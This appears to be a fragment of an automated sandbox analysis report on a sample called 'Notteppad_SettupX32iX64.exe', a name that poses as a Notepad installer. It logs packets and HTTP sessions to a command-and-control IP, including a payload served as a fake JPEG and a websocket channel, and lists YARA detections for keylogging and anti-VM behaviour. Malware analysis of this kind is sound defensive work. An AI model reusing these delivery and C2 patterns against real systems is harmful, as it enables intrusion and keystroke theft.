                                    Jan 13, 2023 05:12:26.398025990 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.398130894 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.409296989 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.439241886 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.439376116 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.469407082 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.469454050 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.514575958 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.587683916 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.587879896 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.587990046 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.588133097 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.617734909 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.617791891 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.617822886 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.617857933 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.617892981 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.617925882 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.617958069 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.618052006 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.618052959 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.618133068 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.618133068 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.620826960 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648189068 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648217916 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648287058 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648287058 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648422003 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648511887 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648574114 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648595095 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648674011 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648699999 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648737907 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648755074 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648772955 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648788929 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648809910 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648823023 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648840904 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648858070 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648874998 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.648885965 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648905039 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.648921013 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.649015903 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.649051905 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.650558949 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.650635004 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.678103924 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678134918 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678155899 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678196907 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678210020 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.678455114 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678522110 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678606033 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678631067 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678647995 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678905010 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678922892 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678937912 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678951025 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.678965092 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679157019 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679183006 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679234982 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679255962 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679275036 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679292917 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679316044 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679402113 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.679420948 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.680269003 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.708012104 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.708178997 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.748972893 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:28.687190056 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:28.757479906 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:28.757587910 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:28.787607908 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:28.794795036 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:28.794833899 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:28.794939995 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:28.795075893 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:28.824944019 CET8049699164.90.172.224192.168.2.3

                                    HTTP Request Dependency Graph

                                    • 164.90.172.224

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349698164.90.172.22480C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2023 05:12:09.288311005 CET110OUTGET /blob/oo6nbv.a50a HTTP/1.1
                                    Host: 164.90.172.224
                                    User-Agent: curl/5.9
                                    Connection: close
                                    X-CSRF-TOKEN: B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==
                                    Cookie: CSRF-TOKEN=B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==; LANG=en-US
                                    Jan 13, 2023 05:12:09.323085070 CET112INHTTP/1.1 200 OK
                                    Content-Length: 929566
                                    Content-Type: image/jpeg
                                    Server: nginx/1.11.13
                                    Date: Fri, 13 Jan 2023 04:12:09 GMT
                                    Connection: close
                                    Data Raw: ff d8 ff e0 00 88 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 1c 0c 0e 00 2d 18 6b e6 c7 e7 be ac b2 bd 14 3b a3 39 7c 5b f2 8e e7 38 c8 45 1d 75 5b 51 94 1d c0 63 e1 d7 5f e9 3a 96 65 4c 50 60 cb f9 31 f1 f4 8d 43 6e 68 c6 d5 fe 33 82 be f1 bb 66 ac 97 13 41 58 0c 4c 41 7f 1c 95 5f 0b 4a a0 81 92 30 c3 1f ab 40 a7 4a b9 81 a9 ca 9f aa a4 d0 ea df 32 f7 88 77 04 9a d2 5d 1f ff f1 44 db cb ac 32 8e ad 07 87 68 35 3f ea ff db 00 84 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 78 00 5f 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f9 f3 c6 73 35 ae a7 6b 15 b3 45 be 5b 28 18 18 a3 1e 59 3e 5a 8c a8 c7 03 8e 07 a5 7c e6 12 11 ab 09 39 6c 9b df 7f 99 f6 53 9c a9 c9 53 5b db a6 dd 4c 83 a9 df 26 63 32 2f 98 b8 c8 d8 80 73 8f 6e 7a d7 4f d5 a9 3d 6d a7 cf fc cc fe b1 59 7b ad eb fd 79 0e 9b 52 bf 74 6f de ca 30 73 ce df 5e 47 4c 62 94 70 d4 ae b4 fc ff 00 cc d2 75 aa 72 dd 5d 7f 5e 85 d8 b5 3b 6b b2 1d 60 b5 8d 06 0b 87 de 01 cb 80 40 c1 27 80 7f 10 0f 42 3e 6c 5e 1e 54 f4 bb 6f e5 db e5 bf e7 e4 f4 eb 86 22 95 55 cc 92 4b ad f9 ba bf 56 f4 fc 55 f6 6a d2 b9 fd a6 64 b5 fb 3c 4a f1 36 04 68 63 6c ec 7e 42 80 79 52 32 ad f5 00 e0 f4 35 87 d5 92 9f 33 d7 af af e4 fa af 9f 4d cd d5 48 54 87 24 6e 9e d7 5a d9 ea 92 ea b7 4f d5 26 d3 d9 8c d4 2e 64 41 24 b7 4d 2d a4 2a e5 21 22 e2 36 32 15 03 70 3b 80 23 a8 39 c6 09 24 0e 95 74 a8 a7 6e 45 77 d7 47 a7 f5 ea 45 69 46 9d dd 57 ca 96 8b de 8b bb 4b 5d ed 6f bb bd b6 16 ca ea 39 e5 8e 16 7b eb 79 a4 66 54 8f e4 03 e5 07 76 e1 8c 82 31 c8 e9 93 db a0 2a 51 e5 4d d9 34 bd 7a fe 01 87 9c 2a ca 31 bb 4e 57 b6 dd 13 df aa db ef ec 47 a8 de a4 50 42 b1 cd 2c 89 3e f1 f2 b0 c3 a8 c0 f4 3d 4e ef 40 3e 6e bc 13 54 f0 f7 6d b5 6b 5b fa fe bc bc c5 5e b5 38 a8 f2 b6 d4 af db 54 ad e4 f7 d7 d3 5d f4 6f 31 26 31 08
                                    Data Ascii: JFIF-k;9|[8Eu[Qc_:eLP`1Cnh3fAXLA_J0@J2w]D2h5?!"$"$x_}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?s5kE[(Y>Z|9lSS[L&c2/snzO=mY{yRto0s^GLbpur]^;k`@'B>l^To"UKVUjd<J6hcl~ByR253MHT$nZO&.dA$M-*!"62p;#9$tnEwGEiFWK]o9{yfTv1*QM4z*1NWGPB,>=N@>nTmk[^8T]o1&1
                                    Jan 13, 2023 05:12:09.323112965 CET113INData Raw: c1 0e 1c b6 02 87 4f 9b d3 39 5c 0f af f2 eb 5d 0e 9a 77 7f e7 fe 67 22 6a 36 4d 3b bf 35 af e1 64 0b a9 4c 8e 41 59 92 48 fe 67 20 0c 05 c8 03 23 6f a9 1f 9e 3b e2 87 86 83 5e 4f fa ee 67 f5 8e 47 cb 2b dd 6f e9 f7 15 64 d4 af 27 82 3f 28 a2 f2
                                    Data Ascii: O9\]wg"j6M;5dLAYHg #o;^OgG+od'?(N*a`j=>Ik2+ SuMBj?RJJe=<MWS?t"^dK1hP"0m.s]nmJoJ\r[/dsIN%
                                    Jan 13, 2023 05:12:09.323133945 CET114INData Raw: ec 9e 97 df bf 53 33 ed 56 f6 77 b6 3f 69 54 71 73 74 18 ab 06 24 db 89 3a b1 6e b9 e5 7e 8a 73 ef d1 cb 29 42 7c bd 17 e3 6e 9f 9f cc f3 e5 5a 9d 2a d4 94 f5 e6 96 df dc e6 dd df ab db d1 16 3e 27 db 58 db f8 f6 e6 5b 3b 78 e3 b6 95 f7 22 28 c2
                                    Data Ascii: S3Vw?iTqst$:n~s)B|nZ*>'X[;x"(+Ns=PgxH&i7-:n{vi<aEWhz&u9/?wzX6WjBap =WZW:xwxPh
                                    Jan 13, 2023 05:12:09.323149920 CET114INData Raw: 11 cb 61 4f 2b d4 1f 41 d4 d6 35 a9 d3 55 dc d3 ff 00 87 bf df fd 5f 63 a3 07 88 af f5 45 46 71 e9 a7 9a b6 8b a2 f9 df e4 d9 c6 5c 07 86 f5 e2 9a 32 ff 00 30 de bb c1 cf af 23 ae 7d 47 ad 7a d1 b3 8a 68 f0 6a 37 09 b5 25 73 d8 7e 1b c9 63 a1 f8
                                    Data Ascii: aO+A5U_cEFq\20#}Gzhj7%s~c~{V%M8xGs0*z9qp5q3_K>xwmP*soZ_61v=m]#Kyx:Io=e)'}O:i30A%C2.*#r?_~
                                    Jan 13, 2023 05:12:09.323230982 CET116INData Raw: 6b 67 25 2e 57 d7 9a 3f 9a 3c 2c 6c 1d 38 38 f4 e4 96 bd 1f a7 f5 7b de e7 4b ae 5b 0b 7d 71 ad a0 66 58 a0 d3 a0 e1 cf 3b 42 91 db 8e e3 a7 1c fa 66 b8 b0 d3 72 a5 cc fa c9 fd fa 1d 14 d7 ef 25 14 ed 68 af ba ed 7e bf d2 b9 53 50 b7 7d 1e c5 34
                                    Data Ascii: kg%.W?<,l88{K[}qfX;Bfr%h~SP}4D=+[UWP);MX]JjZ</^9''z^7<F7q]^W<Q.+n)hVRW5Z4)FQOb
                                    Jan 13, 2023 05:12:09.323343039 CET117INData Raw: 93 c8 0a 02 fc c7 03 03 9c 8f 4e 05 75 d0 76 e6 83 7d bf 53 9a b4 1c 95 3a a9 6a ee fc b4 b6 be 5d 8e 77 51 8e 21 ab 5a d9 c6 b9 36 e5 83 30 07 80 09 3c 93 df 3e c0 7f 33 d1 27 6a 52 7d cf 32 71 bd 78 47 b1 e8 bf 0e 2e 75 3d 26 16 5d 3c a6 37 7c
                                    Data Ascii: Nuv}S:j]wQ!Z60<>3'jR}2qxG.u=&]<7|W)l=+1%yO>Ttz]7)u$) rOz,9xSG,-`XQ={SMGV*;?e}#, a>e${zVjkoX{][_Mo-S
                                    Jan 13, 2023 05:12:09.323384047 CET119INData Raw: 2b 1d b8 6a 15 26 a1 1e ef 53 c7 3c 1e 5b 5b f1 cf 99 76 f0 79 71 06 62 8f 93 90 a1 9b df fb aa 3b 72 c3 8e b5 be 32 3e c7 0b 68 6e ce 7c 35 77 5f 1b fb cd b6 f3 eb e7 d3 4e de 9b 8e d7 26 f3 fe 21 ad f4 57 11 db 8b 7b 88 a4 13 3e 76 f9 9b d4 1e
                                    Data Ascii: +j&S<[[vyqb;r2>hn|5w_N&!W{>vzC8>W.?Dvztny]6W[M/vF5e$_9Ckt31YfFpr{5%O~fZ)XSO8Mky!a>RU@_~FG
                                    Jan 13, 2023 05:12:09.323421955 CET120INData Raw: 23 9f 2d c0 ca 7c d8 e9 69 6b e9 df fc f6 d3 a2 d0 6e b7 6f 1b 69 d3 ea 03 01 ae 2c ee 48 50 f9 0b fb b6 62 a0 12 48 1c fe bd 4f 65 42 6d 54 54 fb 4a 3f 9a 5e 87 16 73 4a 3f 57 75 57 58 bf c9 b3 63 57 c4 7e 30 92 15 5d e3 ec b0 17 3c 0c f0 79 c5
                                    Data Ascii: #-|iknoi,HPbHOeBmTTJ?^sJ?WuWXcW~0]<yN_)[/GqqesJ!c?UV]1~>W%w=Z|(axfX;2%SF}aeu>#m=5RN"PcNy$a)wJj;u,
                                    Jan 13, 2023 05:12:09.323462963 CET121INData Raw: 61 9e 8b 91 61 6b 0f 12 0b 35 02 ea 9e d4 8e 85 8c ca d5 a1 6c 50 12 23 92 41 29 4e e1 e0 db 2a 9d 2c 8e 46 21 a5 d6 72 4d 82 ed 36 b3 14 39 96 26 bb 57 a8 53 48 47 26 e7 ab cd b0 41 32 3d 16 af f3 11 ba b5 d0 5d a2 52 e5 0d 46 29 58 98 b9 f9 21
                                    Data Ascii: aak5lP#A)N*,F!rM69&WSHG&A2=]RF)X!O1!%t#{^QXi#>(7)p#r3nKU^*MT#*q[=K7Xt(nxJ}dmsNI)m1)3).})GLr;1+"|
                                    Jan 13, 2023 05:12:09.323483944 CET122INData Raw: 18 ea ad 35 ca ad 9c a8 d3 52 ac cc 31 c4 0f fb 03 3d 9e 86 1e 72 aa 4b 35 ce 5c cd 41 e4 b3 4e a2 c3 cc 1d c6 f5 4f d0 2c ab 11 b4 d7 c7 56 35 0f 4d 42 4b 3c ec 7b d2 16 67 73 42 18 b2 c9 97 51 47 d6 51 b2 57 a0 47 19 d7 27 cf 95 ef 47 1c c2 3f
                                    Data Ascii: 5R1=rK5\ANO,V5MBK<{gsBQGQWG'G?bXxD]w,FB)-qO|:/kP"c^I&F(.DvxGtD[<:mSEUWA d2^ukPAE*5j@X|5
                                    Jan 13, 2023 05:12:09.353156090 CET124INData Raw: ba 90 c4 d7 12 fe 95 f5 c5 1a b9 73 8c 1f 6a 78 6f 44 c0 b5 3d bb 25 40 e6 ba 8b a2 38 34 ba ed 85 dc 62 f3 27 59 e5 be 68 c8 6a 08 01 a7 3c 13 52 75 ee 58 0b db ca 27 f9 d4 13 25 12 2b 87 14 2d 5d 31 11 43 c3 1d c7 18 4a cf a8 87 19 6d d5 77 2e
                                    Data Ascii: sjxoD=%@84b'Yhj<RuX'%+-]1CJmw."`/p)UURzR3(VgSy#vtX*-K%'KMRp}2agse0?l@1.vTwiBZ$i49heFw,$


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.349699164.90.172.22480C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2023 05:12:26.301784992 CET1084OUTGET /blob/oo6nbv.a50a HTTP/1.1
                                    Host: 164.90.172.224
                                    User-Agent: curl/5.9
                                    Upgrade: websocket
                                    Connection: upgrade
                                    Sec-Websocket-Version: 13
                                    Sec-Websocket-Key: JK0eGt0EctZUUaP
                                    Jan 13, 2023 05:12:26.333707094 CET1085INHTTP/1.1 101 Switching Protocols
                                    Upgrade: websocket
                                    Connection: Upgrade
                                    Sec-WebSocket-Accept: 2Vivv6RVUJckdQYTie0AaD7IW9A=
                                    Jan 13, 2023 05:12:26.337882996 CET1085OUTData Raw: 82 fe 00 c1 99 a2 f7 5b
                                    Data Ascii: [
                                    Jan 13, 2023 05:12:26.368016958 CET1085OUTData Raw: 6f b5 f3 0e 39 85 6b 6c 0c c5 40 2b 99 a2 f7 5b fc 17 41 de 73 ea 63 b6 60 9e 1c 1c ee 4b 69 0f 2d 23 1d 8f 9c 11 62 0e 43 7c fd ec 4b e9 5e ff 39 05 cd f0 10 48 87 a4 0d 41 88 3c ef ec c7 b9 70 f4 1f 28 cc b2 14 ba cc c4 3e ad 1a 8e 4e 89 e5 24
                                    Data Ascii: o9kl@+[Asc`Ki-#bC|K^9HA<p(>N$_:<le6.`*Q/c7Yh8Q%MZpD3Zz>Wxq5[7D=gMl~2s2L02
                                    Jan 13, 2023 05:12:26.398130894 CET1085INData Raw: 82 60 30 b1 98 ac 22 6f 6c 8e 65 53 7e 57 30 97 0c e3 93 83 52 70 1e cd e1 19 33 04 ef 83 94 bb 43 71 3d e6 3b 92 b1 0a 66 4e 5c 7f 3c fc 00 1f ba 46 de 22 c9 94 55 43 88 7d 83 78 92 5f 9d a3 46 33 f1 be f1 26 df be 90 01 95 84 ad a7 79 9e 39 28
                                    Data Ascii: `0"oleS~W0Rp3Cq=;fN\<F"UC}x_F3&y9(Lr"=f/E*
                                    Jan 13, 2023 05:12:26.409296989 CET1085OUTData Raw: 82 88 fb e2 44 8e
                                    Data Ascii: D
                                    Jan 13, 2023 05:12:26.439376116 CET1085OUTData Raw: a2 8c 6e ce 48 e5 1f 5e
                                    Data Ascii: nH^
                                    Jan 13, 2023 05:12:26.469454050 CET1086INData Raw: 82 7e 03 0f c0 0f 15 29 4f 09 36 42 6c fa 29 85 e5 6c d3 8e 13 93 9d 4e 0b 2b 49 e6 64 32 78 da 29 8c 3b 94 af 15 e5 00 0d 18 a7 df 49 fe 30 ff d6 2e 82 c1 83 fe f6 97 57 a3 5c 5f 1d 85 a3 0e 01 69 25 f9 e0 40 6c 22 ef b2 4a 27 f0 65 c0 a3 c3 ec
                                    Data Ascii: ~)O6Bl)lN+Id2x);I0.W\_i%@l"J'eeT=OAc]*1g\dpUeZwCdv'jt[}MGuwx\/;L8H1@c?[6+\O\>`9<$uS[V,|oX=5r
                                    Jan 13, 2023 05:12:26.587683916 CET1086OUTData Raw: 82 e9 dd 64 3a 6b
                                    Data Ascii: d:k
                                    Jan 13, 2023 05:12:26.587879896 CET1091OUTData Raw: 43 7d 7a ff af 4a 46 64 7a 63 d5 55 e8 b0 d6 29 73 dc d9 16 c5 cf 56 99 79 f4 40 e1 b6 70 a1 02 25 d5 af c9 88 ed 34 64 5a d6 50 b6 c5 9e f4 93 ff 33 27 a2 e3 d5 38 e3 7e 3b 4f 3e 39 a6 0e 46 c0 93 f2 e9 c9 96 80 b7 09 ee 05 ab 1d 72 9e 9f 83 c5
                                    Data Ascii: C}zJFdzcU)sVy@p%4dZP3'8~;O>9Fre*'J;gl= {Fihmz@DJlk%bEs_KD:I&#t5sa5`nUJL_;7!kI`[
                                    Jan 13, 2023 05:12:26.587990046 CET1095OUTData Raw: 75 b4 f2 90 45 b6 0b fb be 08 b0 7f b3 a5 d6 3a 26 df 60 41 15 92 a7 96 60 52 e6 c8 21 c7 cd a5 78 b6 46 2b 3b 64 6d 1c ca b8 4c 77 48 f0 71 24 a9 ec 48 60 37 4d 7e a1 b7 65 c5 d6 a5 c9 fc 0f 6c fe 20 ea 1f 18 f2 3b 58 aa 10 57 98 16 e8 d7 06 ce
                                    Data Ascii: uE:&`A`R!xF+;dmLwHq$H`7M~el ;XW+&Gl5_,<%f%C^!F15R}IWy6$]n|BGrxO0/MCsL!:S_cIu%Cf$~ 1^y8xDvV[t/LMAb
                                    Jan 13, 2023 05:12:26.588133097 CET1099OUTData Raw: 82 fe 20 00 e1 d6 ea c5 37 f6 58 0c 09 36 49 44 b9 df e8 8c c1 58 1e cc 12 a9 1b fc d2 c9 6f cc ec 9f 89 d2 13 57 63 02 9c 8a 77 24 a1 14 06 ed 91 43 33 47 a0 36 01 78 97 1f 64 a7 b7 db ce 97 4d 66 ef 94 1f c5 90 8d 30 06 f2 3e 0e 6e a8 3e c5 82
                                    Data Ascii: 7X6IDXoWcw$C3G6xdMf0>n>\/^lf#CX[0:%yZ$5^TsAvM:\?w}(1i-f-j6!6J-t4iQ2P9"X)&!M{{w=QoS[
                                    Jan 13, 2023 05:12:26.618052006 CET1102OUTData Raw: ae 4b 52 08 b8 8f d0 95 2a 02 90 9e b6 dd bc 3f 48 b7 d9 7b 06 be ab 29 98 04 0f c0 55 ee b3 bc 8e 90 aa 50 91 38 6d 2c f8 08 cf 0c df 5a 91 78 12 e1 61 48 b0 3a 77 f8 5c fd 37 6a da b1 3e 09 9b 7f 47 4b 8c 37 cf 4d 1f 44 f7 09 c3 ae 85 25 8b e6
                                    Data Ascii: KR*?H{)UP8m,ZxaH:w\7j>GK7MD%B`f9S=,]7XT5YO@#-_l1F1/mYz0U=W~UaS1Qn9YSLqF|VAP Imd9R}{Ie
                                    Jan 13, 2023 05:12:26.618052959 CET1118OUTData Raw: 94 61 89 3d e6 00 20 33 3f 6c 7d 80 0e d0 8e 1a f7 b6 4c 1b 61 ab f3 2b 1f 8a 12 16 d0 dc 75 3e fc 59 79 94 b9 80 68 03 39 dd 84 24 66 f6 66 68 dd 3c e1 ae c4 06 46 f9 61 85 58 e3 65 14 56 74 87 dd 69 47 82 40 71 db 55 28 bf 10 61 75 0e 51 b9 2b
                                    Data Ascii: a= 3?l}La+u>Yyh9$ffh<FaXeVtiG@qU(auQ+;ktMXu[5J~fO<%^`@X]5^iN^~n\y;}KI^DpUm+4NwrSk?h$CgK?p
                                    Jan 13, 2023 05:12:26.708178997 CET1178INData Raw: 82 04 34 19 cc e8
                                    Data Ascii: 4
                                    Jan 13, 2023 05:12:28.794795036 CET1179INData Raw: 82 32 4b 1a 53 70 da 15 c5 ab f9 2b 03 6e 16 4f 2b b0 c7 67 82 4e 0d ee 7d cb aa 64 e6 89 b4 a2 5e 4f f2 2a 45 6c 92 71 b7 68 2f 22 47 b8 51 d8 e3 64 98 41
                                    Data Ascii: 2KSp+nO+gN}d^O*Elqh/"GQdA


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:05:11:58
                                    Start date:13/01/2023
                                    Path:C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    Imagebase:0x400000
                                    File size:292381 bytes
                                    MD5 hash:E7DFB892DBD65B0ED6FED69B20EDF739
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.243662510.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Target ID:1
                                    Start time:05:12:10
